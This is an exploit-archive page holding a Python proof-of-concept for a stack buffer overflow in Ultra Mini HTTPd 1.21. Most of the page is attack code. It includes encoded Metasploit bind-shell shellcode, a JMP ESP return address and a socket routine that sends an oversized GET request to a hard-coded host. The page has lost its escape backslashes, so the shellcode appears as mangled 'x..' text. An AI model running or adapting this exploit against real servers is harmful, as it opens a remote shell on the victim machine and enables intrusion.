Home / exploits Ultra Mini HTTPd 1.21 Buffer Overflow
Posted on 12 July 2013
? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 # Exploit Title: Ultra Mini HTTPD stack buffer overflow # Date: 10 July 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.picolix.jp/ # Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html # Version: 1.21 # Tested on: Windows XP Professional SP2, English # # Description: # A buffer overflow is triggered when requesting a very long # resource name. # import socket import struct # msfpayload windows/shell_bind_tcp R | # msfencode -b "x00x0ax0dx20x0bx09x0c" # [*] x86/shikata_ga_nai succeeded with size 368 (iteration=1) shellcode = ( "xbax1fxb5xaexa1xddxc4xd9x74x24xf4x5ex33xc9" + "xb1x56x31x56x13x83xc6x04x03x56x10x57x5bx5d" + "xc6x1exa4x9ex16x41x2cx7bx27x53x4ax0fx15x63" + "x18x5dx95x08x4cx76x2ex7cx59x79x87xcbxbfxb4" + "x18xfax7fx1axdax9cx03x61x0ex7fx3dxaax43x7e" + "x7axd7xabxd2xd3x93x19xc3x50xe1xa1xe2xb6x6d" + "x99x9cxb3xb2x6dx17xbdxe2xddx2cxf5x1ax56x6a" + "x26x1axbbx68x1ax55xb0x5bxe8x64x10x92x11x57" + "x5cx79x2cx57x51x83x68x50x89xf6x82xa2x34x01" + "x51xd8xe2x84x44x7ax61x3exadx7axa6xd9x26x70" + "x03xadx61x95x92x62x1axa1x1fx85xcdx23x5bxa2" + "xc9x68x38xcbx48xd5xefxf4x8bxb1x50x51xc7x50" + "x85xe3x8ax3cx6axdex34xbdxe4x69x46x8fxabxc1" + "xc0xa3x24xccx17xc3x1fxa8x88x3ax9fxc9x81xf8" + "xcbx99xb9x29x73x72x3axd5xa6xd5x6ax79x18x96" + "xdax39xc8x7ex31xb6x37x9ex3ax1cx4ex98xf4x44" + "x03x4fxf5x7axb2xd3x70x9cxdexfbxd4x36x76x3e" + "x03x8fxe1x41x61xa3xbaxd5x3dxadx7cxd9xbdxfb" + "x2fx76x15x6cxbbx94xa2x8dxbcxb0x82xc4x85x53" + "x58xb9x44xc5x5dx90x3ex66xcfx7fxbexe1xecxd7" + "xe9xa6xc3x21x7fx5bx7dx98x9dxa6x1bxe3x25x7d" + "xd8xeaxa4xf0x64xc9xb6xccx65x55xe2x80x33x03" + "x5cx67xeaxe5x36x31x41xacxdexc4xa9x6fx98xc8" + "xe7x19x44x78x5ex5cx7bxb5x36x68x04xabxa6x97" + "xdfx6fxd6xddx7dxd9x7fxb8x14x5bxe2x3bxc3x98" + "x1bxb8xe1x60xd8xa0x80x65xa4x66x79x14xb5x02" + "x7dx8bxb6x06" ) # 7C941EED , JMP ESP , ntdll.dll payload = "A" * 5392 + struct.pack("<I", 0x7C941EED) payload += "x81xc4xf0xeaxffxff" + shellcode + "B" * 4230 print "[+] sending payload, length", len(payload) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.37.175", 80)) buf = ( "GET /" + payload + " HTTP/1.1 " + "Host: 192.168.37.175" + " " ) s.send(buf) s.close()
